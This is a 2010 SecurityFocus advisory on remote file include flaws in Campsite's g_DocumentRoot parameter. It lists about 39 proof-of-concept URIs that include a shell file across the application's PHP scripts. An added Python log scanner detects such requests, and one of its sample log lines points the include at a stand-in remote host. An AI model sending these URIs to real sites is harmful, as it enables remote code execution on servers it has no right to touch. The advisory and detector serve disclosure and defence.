Campsite G_DocumentRoot Parameter Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/classes/Alias.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Article.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleComment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleData.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleImage.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleIndex.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticlePublish.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleTopic.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleType.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Attachment.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Country.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/DatabaseObject.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Event.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Image.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Issue.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/IssuePublish.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Language.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Log.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/LoginAttempts.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Section.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/ShortURL.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Subscription.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/SystemPref.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Template.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/Topic.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/UrlType.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt?
http://www.example.com/classes/UserType.php?g_DocumentRoot=shell.txt?
http://www.example.com/configuration.php?g_DocumentRoot=shell.txt?
http://www.example.com/db_connect.php?g_DocumentRoot=shell.txt?
http://www.example.com/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt?
http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt?
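
To check whether a site has received requests of this shape, web server access logs can be searched for any request that supplies `g_DocumentRoot` in the query string. The Python script below is an added example, not part of the original advisory or of Campsite's code; it assumes common/combined-format access logs and that legitimate clients never send this parameter, and its sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "g_DocumentRoot"  # parameter named in the advisory
# Client, method, request target and status of a common/combined log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3})')
# A value carrying a URL scheme points the include at another host.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def inspect_line(line):
    """Return a finding dict if the request sets g_DocumentRoot, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    # parse_qsl percent-decodes names, so g%5FDocumentRoot is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # PHP also accepts array syntax (g_DocumentRoot[]); compare the base name.
        if name.split("[", 1)[0] == PARAM:
            return {
                "client": client,
                "method": method,
                "script": parts.path,
                "value": value,
                "remote": bool(SCHEME_RE.match(value)),
                "status": int(status),
            }
    return None

def scan(lines):
    """Return findings for every log line that supplies the parameter."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /classes/Article.php?g_DocumentRoot=shell.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?page=1 HTTP/1.1" 200 8041',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /db_connect.php?g%5FDocumentRoot=http%3A%2F%2Fhost.invalid%2Fshell.txt%3F HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET query strings appear in access logs, so parameters sent in a POST body or a cookie are not visible to this check.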


 

Copyright 2010, SecurityFocus